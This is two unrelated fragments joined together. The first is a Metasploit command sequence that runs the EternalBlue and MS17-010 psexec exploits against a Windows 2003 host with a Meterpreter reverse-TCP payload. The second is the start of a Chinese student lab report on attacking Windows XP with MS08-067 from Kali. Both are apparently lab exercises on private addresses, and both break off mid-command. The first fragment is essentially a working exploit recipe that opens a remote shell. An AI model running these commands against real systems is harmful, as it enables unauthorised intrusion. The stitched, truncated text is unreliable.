0x00 window 2003 R2 x86 use exploit/windows/smb/ms17_010_eternalblue show options set rhost 192.168.204.133 set lhost 192.168.204.129 set payload windows/meterpreter/reverse_tcp run use exploit/windows/smb/ms17_010_psexec set rhost 192.168.204.133 se
20145327 <网络对抗>MSF基础应用 主动攻击ms08_067 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版) kali ip地址:192.168.43.54 windows xp sp3 ip地址:192.168.43.56 ping通: MS08_067远程漏洞攻击实践:Shell 1.开启msfconsole. 2.输入命令search ms08_067,会显示出找到的渗透模块. 3.输入命令use exploit/windows/smb/ms08_